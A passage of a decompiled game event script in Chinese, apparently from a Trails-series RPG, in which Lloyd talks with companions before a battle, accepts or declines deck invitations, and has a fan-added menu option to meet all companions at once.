"马上就会过去的。\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 5) Jump("loc_4A41") label("loc_49A7") ChrTalk( 0xE, ( "#5P#00306F……这样啊。\x01", "算了,反正也不是什么\x01", "令人愉快的话题……\x02\x03", "#00300F不过,你要是改变主意了,\x01", "可以再来和我说一声。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00000F嗯,我知道了。\x02", ) CloseMessageWindow() OP_5A() label("loc_4A41") SetChrSubChip(0xE, 0x0) EventEnd(0x5) Return() # Function_24_43E0 end def Function_25_4A48(): pass label("Function_25_4A48") EventBegin(0x0) Fade(500) OP_68(100500, 1000, -240, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(16970, 0) SetChrPos(0x101, 100340, 0, -1010, 0) SetChrSubChip(0xF, 0x1) OP_93(0xC, 0xB4, 0x0) OP_4B(0xC, 0xFF) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, 
MakeScenarioFlags(0x1DB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_50AA") ChrTalk( 0xF, "#5P#10100F罗伊德警官,辛苦你了!\x02", ) CloseMessageWindow() ChrTalk( 0xC, "#5P#01902F辛苦啦~\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00000F你们也辛苦了,诺艾尔、芙兰。\x02\x03", "#00009F明天就要展开作战了,\x01", "但这里的气氛却很平和呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10102F真不好意思。\x02\x03", "#10106F我正在检修武器,\x01", "芙兰却突然跑了进来……\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#5P#01909F呵呵,我是来给\x01", "姐姐打气的~\x02\x03", "#01904F因为我已经做好了\x01", "充足的准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00004F哈哈,真是可靠啊。\x02\x03", "#00000F芙兰,你明天也要在\x01", "后援岗位上大显身手哦,\x01", "今天就尽量养精蓄锐吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#5P#01902F嗯,当然~\x01", "……其实,我就是为了\x01", "这个才来的~!\x02\x03", "#01909F不管怎么说,\x01", "我只要待在姐姐身边,\x01", "就可以补充能量了呢!\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) OP_63(0xF, 0x0, 1700, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#12P#00012F哈哈,也许\x01", "正如你所说。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10106F唉,真是的……\x01", "只要别妨碍到我就好。\x02\x03", "#10102F那、那个,罗伊德警官。\x01", "我今天晚上还要\x01", "再和司令联络一次。\x02\x03", "#10103F为了明天的作战,\x01", "还是再做一次最终确认为好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00000F嗯,那就拜托你了。\x02\x03", "#00003F诺艾尔,你明天也要\x01", "和我们一起潜入市内……\x02\x03", "#00000F今天一定要做好充分准备,\x01", "然后早点休息。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, "#5P#10109F是!\x02", ) CloseMessageWindow() OP_63(0xC, 0x0, 2000, 0x18, 0x1B, 0xFA, 0x0) Sleep(2000) OP_64(0xC) ChrTalk( 0xC, ( "#11P#01905F(姐姐,姐姐!\x01", " 再这么下去,你们今天的谈话\x01", " 可就要结束了哦!)\x02\x03", "#01909F(这可是个难得的好机会啊,\x01", " 你想就这样白白浪费掉吗~?)\x02", ) ) CloseMessageWindow() OP_63(0xF, 0x0, 1700, 0x2, 0x7, 0x50, 0x1) Sound(28, 0, 100, 0) Sleep(1000) ChrTalk( 0xF, ( "#5P#10111F(什、什么好机会……\x01", " 芙兰,你别再乱说……!)\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) Sound(29, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#12P#00005F……嗯?怎么了?\x01", "难道出了什么问题吗?\x02", ) ) CloseMessageWindow() OP_63(0xF, 0x0, 1700, 0x28, 0x2B, 0x64, 0x0) Sleep(1000) OP_64(0xF) ChrTalk( 0xF, "#5P#10114F没、没有啦,那个……\x02", ) CloseMessageWindow() ChrTalk( 0xC, "#11P#01909F(加油呀,姐姐!)\x02", ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10103F……那个……等你有空的时候,\x01", "可以来一趟甲板吗?\x02\x03", "#10101F虽然并不是很重要的事,\x01", "但我有件事情想拜托\x01", "罗伊德警官帮忙。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DB, 0) Jump("loc_5117") label("loc_50AA") ChrTalk( 0xF, ( "#5P#10103F……稍后……可以来甲板吗?\x02\x03", "#10101F虽然并不是很重要的事,\x01", "但我有件事情想拜托\x01", "罗伊德警官帮忙。\x02", ) ) CloseMessageWindow() label("loc_5117") Menu( 0, -1, -1, 0, ( "接受诺艾尔的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_520C") ChrTalk( 0x101, ( "#12P#00002F好啊,我知道了。\x01", "诺艾尔竟然有事情要拜托我,\x01", "这可真是稀奇……\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, "#11P#01909F(成功啦!姐姐!)\x02", ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10114F那、那么……\x01", "我处理完手边的事情之后\x01", "就会过去的……\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 6) Jump("loc_52E0") label("loc_520C") ChrTalk( 0xF, ( "#5P#10106F……这、这样啊……\x02\x03", "#10112F不、不用放在心上!\x01", "真的不是很重要\x01", "的事情。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#5P#01906F唔~这也没办法~\x02\x03", "#01901F罗伊德警官,你要是\x01", "改变主意了,就再去\x01", "和姐姐说一声吧~\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00000F嗯,我知道了。\x02", ) CloseMessageWindow() OP_5A() label("loc_52E0") 
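# Annotation (added, hedged): loc_52E0 below is the common exit of Function_25_4A48; it appears
# to restore Noel's (chr 0xF) sub-chip and Fran's (chr 0xC) facing before the event ends.
# Function_26_52F2, defined next, appears to be the matching deck-invitation scene for Wazy
# (chr 0xA) and Abbas (chr 0x8), gated on flag 0x1DB bit 1.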
SetChrSubChip(0xF, 0x0) OP_93(0xC, 0x10E, 0x0) OP_4C(0xC, 0xFF) EventEnd(0x5) Return() # Function_25_4A48 end def Function_26_52F2(): pass label("Function_26_52F2") EventBegin(0x0) Fade(500) OP_68(102260, 800, -94610, 0) MoveCamera(48, 19, 0, 0) OP_6E(500, 0) SetCameraDistance(16290, 0) SetChrPos(0x101, 100450, 0, -95200, 90) SetChrSubChip(0x8, 0x2) SetChrSubChip(0xA, 0x1) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_595F") ChrTalk( 0x101, ( "#6P#00005F瓦吉、阿巴斯……\x01", "你们在喝酒吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10404F嗯,因为我们已经\x01", "完成了必要的准备工作。\x02\x03", "#10402F呵呵,你要不要也来一杯?\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00006F喂喂……明天还要作战呢,\x01", "你们这样没问题吗?\x02\x03", "#00001F边上已经摆着很多\x01", "被你们喝空的杯子了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F不必担心,\x01", "这是让维恩图斯特地\x01", "调制的无酒精鸡尾酒。\x02\x03", "不会对明天的作战\x01", "造成任何影响。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00006F啊,是这样啊……\x02\x03", "#00000F算啦,既然阿巴斯这么说,\x01", "那我这次就相信了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10409F呵呵,我一个人喝的时候,\x01", "你也应该相信啊。\x02\x03", "#10403F……对了,有件事情还是\x01", "通知你一声比较好。\x02\x03", "#10400F关于明天的作战,法王阁下\x01", "已经下达了正式的参战许可。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#6P#00005F啊……是吗。\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F梅尔卡瓦的主要用途是执行\x01", "隐秘活动,本应尽量避免将其\x01", "使用于大规模的作战中……\x02\x03", "但考虑到整个大陆的混乱状况,\x01", "就算稍微有所暴露,也是没有办法。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00006F这样啊……\x01", "教会能做出这种判断,真是值得感谢。\x02\x03", "#00013F……总之,明天就要决战了,\x01", "还请二位助我一臂之力。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, "#11P#10402F呵呵,明白了,队长。\x02", ) CloseMessageWindow() ChrTalk( 0x8, "#5P#12102F我们自然会全力相助。\x02", ) CloseMessageWindow() OP_63(0xA, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xA) ChrTalk( 0xA, ( "#11P#10403F对了……我刚想起来。\x01", "还有另外一件事,\x01", "也应该告诉你。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1) OP_63(0x8, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1) Sleep(1000) ChrTalk( 0x101, "#6P#00005F哎……?\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F……瓦吉,\x01", "那件事情在目前\x01", "仍属于机密事项哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10405F哎,这样啊?\x02\x03", "#10409F呵呵,既然如此,\x01", "那我就只能偷偷地告诉你了。\x02", ) ) CloseMessageWindow() OP_63(0x8, 0x0, 2000, 0xE, 0xF, 0xFA, 0x2) Sound(23, 0, 100, 0) OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x8, ( "#5P#12100F……算了,既然瓦吉都\x01", "这么说了,那也没办法。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00012F我、我完全听不懂\x01", "你们在说什么……\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10404F呵呵,这件事情\x01", "与你们有很大关系。\x02\x03", "#10402F如果你有兴趣,\x01", "待会就去甲板上等我吧,\x01", "这样我就可以偷偷告诉你了。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DB, 1) Jump("loc_59DE") label("loc_595F") ChrTalk( 0xA, ( "#11P#10404F还有另外一件事,\x01", "也应该告诉你。\x02\x03", "#10402F呵呵,如果你有兴趣,\x01", "待会就去甲板上等我吧,\x01", "这样我就可以偷偷告诉你了。\x02", ) ) CloseMessageWindow() label("loc_59DE") Menu( 0, -1, -1, 0, ( "接受瓦吉的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_5B01") ChrTalk( 0x101, ( "#6P#00006F……我知道了,\x01", "去甲板等你是吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, "#11P#10409F呵呵,就这么定了。\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F瓦吉,谨慎起见,我话说在先,\x01", "你绝不能再泄露更多了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10404F呵呵,我知道啦。\x02\x03", "#10400F我喝完酒才会过去,\x01", 
"你不用着急哦。\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 7) Jump("loc_5B5E") label("loc_5B01") ChrTalk( 0xA, ( "#11P#10405F……这样吗?\x01", "那也无所谓……\x02\x03", "#10404F呵呵,如果你改变主意了,\x01", "就再来找我吧。\x02", ) ) CloseMessageWindow() OP_5A() label("loc_5B5E") SetChrSubChip(0xA, 0x0) SetChrSubChip(0x8, 0x0) EventEnd(0x5) Return() # Function_26_52F2 end def Function_27_5B69(): pass label("Function_27_5B69") FadeToDark(500, 0, -1) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_END)), "loc_5C0E") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向艾莉道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向艾莉道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 3) Jump("loc_5F75") label("loc_5C0E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_END)), "loc_5CA8") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向缇欧道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向缇欧道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 4) Jump("loc_5F75") label("loc_5CA8") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_END)), "loc_5D42") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向兰迪道歉,\x01", " 告诉他我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向兰迪道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 5) Jump("loc_5F75") label("loc_5D42") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_END)), "loc_5DE0") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向诺艾尔道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向诺艾尔道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 6) Jump("loc_5F75") label("loc_5DE0") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_END)), "loc_5E7A") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向瓦吉道歉,\x01", " 告诉他我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向瓦吉道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 7) Jump("loc_5F75") label("loc_5E7A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AB, 0)), scpexpr(EXPR_END)), "loc_5F14") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向莉夏道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向莉夏道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AB, 0) Jump("loc_5F75") label("loc_5F14") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00003F(……在休息室做好\x01", " 明天必要的准备工作之后,\x01", " 就去甲板吧。)\x02", ) ) CloseMessageWindow() 
OP_5A() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) label("loc_5F75") Return() # Function_27_5B69 end def Function_28_5F76(): pass label("Function_28_5F76") TalkBegin(0xFF) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AB, 0)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_6571") EventBegin(0x0) Fade(500) SetChrPos(0x101, 1420, 0, -92300, 90) OP_68(2300, 1000, -92050, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(19000, 0) OP_0D() Sleep(300) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_END)), "loc_6092") ChrTalk( 0x101, ( "#00005F#6P(对了……之前和艾莉有约,\x01", " 得去甲板和她谈一些事情。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_6092") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_END)), "loc_6142") ChrTalk( 0x101, ( "#00005F#6P(对了……缇欧有事想和我商量,\x01", " 得去甲板和她碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_6142") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_END)), "loc_61F0") ChrTalk( 0x101, ( "#00005F#6P(对了……兰迪有话想和我说,\x01", " 得去甲板和他碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_61F0") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_END)), "loc_62A0") ChrTalk( 0x101, ( "#00005F#6P(对了……诺艾尔有事想拜托我,\x01", " 得去甲板和她碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_62A0") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_END)), "loc_635C") ChrTalk( 0x101, ( "#00005F#6P(对了……瓦吉刚才说了一些很令人\x01", " 在意的话,得去甲板和他碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_635C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AB, 0)), scpexpr(EXPR_END)), "loc_6405") ChrTalk( 0x101, ( "#00005F#6P(对了……之前和莉夏有约,\x01", " 得去甲板上和她聊聊。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() label("loc_6405") Sound(814, 0, 100, 0) FadeToDark(300, 0, 100) SetMessageWindowPos(-1, -1, -1, -1) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "一旦结束自由行动,本日就会结束,\x01", "剧情也会自动进展,敬请注意。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) Sleep(300) ''' Menu( 0, -1, -1, 0, ( "【还有其它事情】\x01", # 0 "【结束自由行动,去和约见的同伴会面】\x01", # 1 ) ) MenuEnd(0x0) ''' optlist = \ [ '【还有其它事情】', '【结束自由行动,去和约见的同伴会面】', '【结束自由行动,依次和所有后宫会面】', ] CreateMenuAndShow(optlist) OP_60(0x0) Switch( (scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)), (0, "loc_64D1"), (1, "loc_64D6"), (2, "fuck_all_member"), (SWITCH_DEFAULT, "loc_6558"), ) label('fuck_all_member') StopSound(498, 1500, 70) FadeToDark(1500, 0, -1) OP_0D() OP_21(0xFA0) WaitBGM() SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "之后,罗伊德为明日的解放作战做好了\x01", 
"必要的准备工作,来到了夜幕笼罩下的甲板。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetScenarioFlags(0x22, 0) SetScenarioFlags(0x1AA, 3) SetScenarioFlags(0x1AA, 4) SetScenarioFlags(0x1AA, 5) SetScenarioFlags(0x1AA, 6) SetScenarioFlags(0x1AA, 7) SetScenarioFlags(0x1AB, 0) NewScene("e440c", 0, 0, 0) IdleLoop() Jump("loc_6558") label("loc_64D1") Jump("loc_6558") label("loc_64D6") StopSound(498, 1500, 70) FadeToDark(1500, 0, -1) OP_0D() OP_21(0xFA0) WaitBGM() SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "之后,罗伊德为明日的解放作战做好了\x01", "必要的准备工作,来到了夜幕笼罩下的甲板。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetScenarioFlags(0x22, 0) NewScene("e440B", 0, 0, 0) IdleLoop() Jump("loc_6558") label("loc_6558") OP_5A() SetChrPos(0x0, 550, 0, -92390, 270) EventEnd(0x5) Jump("loc_686D") label("loc_6571") ChrTalk( 0x101, ( "#00005F(……今天是不是\x01", " 应该早点休息呢?)\x02\x03", "#00003F(但明天就要展开作战了,\x01", " 还是去确认一下大家的\x01", " 状态为好……)\x02", ) ) CloseMessageWindow() Sound(814, 0, 100, 0) FadeToDark(300, 0, 100) SetMessageWindowPos(-1, -1, -1, -1) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "如果选择在休息室休息,\x01", "本日就会结束,剧情也会\x01", "自动进展,敬请注意。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) FadeToBright(300, 0) Sleep(300) Menu( 0, -1, -1, 1, ( "【还有其它事情】\x01", # 0 "【结束自由行动,入内休息】\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_66BD") Jump("loc_686D") label("loc_66BD") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_686D") EventBegin(0x0) Fade(500) OP_68(2040, 1000, -91940, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(20000, 0) SetChrPos(0x101, 1300, 0, -92030, 90) CreatePortrait(1, 0, 8, 480, 264, 0, 0, 512, 256, 0, 0, 480, 256, 0xFFFFFF, 0x0, "c_vis416.itp") OP_0D() Sleep(300) ChrTalk( 0x101, ( "#00003F#6P(……先在休息室做一番准备,\x01", " 然后就直接休息吧。)\x02\x03", "#00001F(解放克洛斯贝尔市的作战就在明天……\x01", " 无论如何也要取得成功!)\x02", ) ) CloseMessageWindow() Sound(100, 0, 100, 0) OP_74(0x3, 0x1E) OP_71(0x3, 0x0, 0xA, 0x1, 0x8) Sleep(500) def lambda_67EB(): OP_95(0xFE, 4300, 0, -92030, 1000, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_67EB) Sleep(1000) StopSound(498, 2000, 70) FadeToDark(1000, 0, -1) OP_0D() EndChrThread(0x101, 0x1) OP_21(0xFA0) WaitBGM() Sleep(1000) Sound(13, 0, 100, 0) Sleep(4000) OP_CB(0x1, 0x3, 0xFFFFFFFF, 0x1F4, 0x0, 0x0) OP_CC(0x0, 0x1, 0x3) Sleep(2000) OP_CB(0x1, 0x3, 0xFFFFFF, 0x1F4, 0x0, 0x0) OP_CC(0x0, 0x1, 0x3) OP_CC(0x1, 0xFF, 0x0) SetScenarioFlags(0x23, 1) NewScene("e4300", 0, 0, 0) IdleLoop() EventEnd(0x3) label("loc_686D") TalkEnd(0xFF) Return() # Function_28_5F76 end def Function_29_6871(): pass label("Function_29_6871") EventBegin(0x0) FadeToDark(0, 0, -1) SetChrPos(0x0, -150, 0, -88230, 180) EventEnd(0x5) Return() # Function_29_6871 end def Function_30_6891(): pass label("Function_30_6891") EventBegin(0x0) FadeToDark(0, 0, -1) LoadChrToIndex("apl/ch50203.itc", 0x1E) LoadChrToIndex("chr/ch06902.itc", 0x1F) LoadChrToIndex("chr/ch06000.itc", 0x20) LoadChrToIndex("chr/ch05800.itc", 0x21) SoundLoad(943) Jc((scpexpr(EXPR_EXEC_OP, "GetPartyIndex(0x4)"), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_68CB") AddParty(0x4, 0xFF, 0xFF) label("loc_68CB") Jc((scpexpr(EXPR_EXEC_OP, "GetPartyIndex(0x8)"), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_68DE") AddParty(0x8, 0xFF, 0xFF) label("loc_68DE") 
Jc((scpexpr(EXPR_EXEC_OP, "GetPartyIndex(0x5)"), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_68F1") AddParty(0x5, 0xFF, 0xFF) label("loc_68F1") ClearChrFlags(0x4, 0x80) ClearChrBattleFlags(0x4, 0x8000) ClearChrFlags(0x5, 0x80) ClearChrBattleFlags(0x5, 0x8000) ClearChrFlags(0x6, 0x80) ClearChrBattleFlags(0x6, 0x8000) SetChrFlags(0x10, 0x80) SetChrFlags(0xB, 0x80) SetChrFlags(0xE, 0x80) SetChrFlags(0xF, 0x80) SetChrFlags(0xA, 0x80) SetChrFlags(0xD, 0x80) ClearChrFlags(0xC, 0x80) ClearChrFlags(0x8, 0x80) ClearChrFlags(0x13, 0x80) ClearChrFlags(0x11, 0x80) ClearChrFlags(0x12, 0x80) SetChrFlags(0x105, 0x4) SetChrChipByIndex(0x105, 0x3) SetChrSubChip(0x105, 0x2) ClearChrFlags(0x9, 0x80) SetChrChipByIndex(0x9, 0x1E) SetChrSubChip(0x9, 0x0) OP_4B(0xC, 0xFF) ClearChrFlags(0xC, 0x80) SetChrFlags(0xC, 0x8000) SetChrFlags(0xC, 0x4) SetChrChipByIndex(0xC, 0x1F) SetChrSubChip(0xC, 0x0) ClearChrFlags(0x12, 0x80) ClearChrBattleFlags(0x12, 0x4) SetChrFlags(0x12, 0x8000) SetChrChipByIndex(0x12, 0x20) SetChrSubChip(0x12, 0x0) ClearChrFlags(0x11, 0x80) ClearChrBattleFlags(0x11, 0x4) SetChrFlags(0x11, 0x8000) SetChrChipByIndex(0x11, 0x21) SetChrSubChip(0x11, 0x0) SetChrSubChip(0x13, 0x5) ClearMapObjFlags(0x1, 0x4) SetMapObjFlags(0x1, 0x1000) OP_74(0x1, 0x14) OP_70(0x1, 0x24) Sleep(1000) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "就这样,牢不可破、笼罩着整个\x01", "克洛斯贝尔市的『结界』消失了。\x02\x03", "罗伊德等人与『黑月』的曹,\x01", "以及反抗组织的米蕾优等人取得了联系……\x02\x03", "而索妮亚司令也作出了保证,\x01", "贝尔加德门和唐古拉姆门的\x01", "部队将会保持中立。\x02\x03", "入夜之后……\x02\x03", "众人在梅尔卡瓦的舰桥上\x01", "接到了凯文神父发来的联络。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetChrPos(0x9, -3150, -1350, 7150, 315) SetChrPos(0x13, 2900, 0, -850, 0) SetChrPos(0x11, 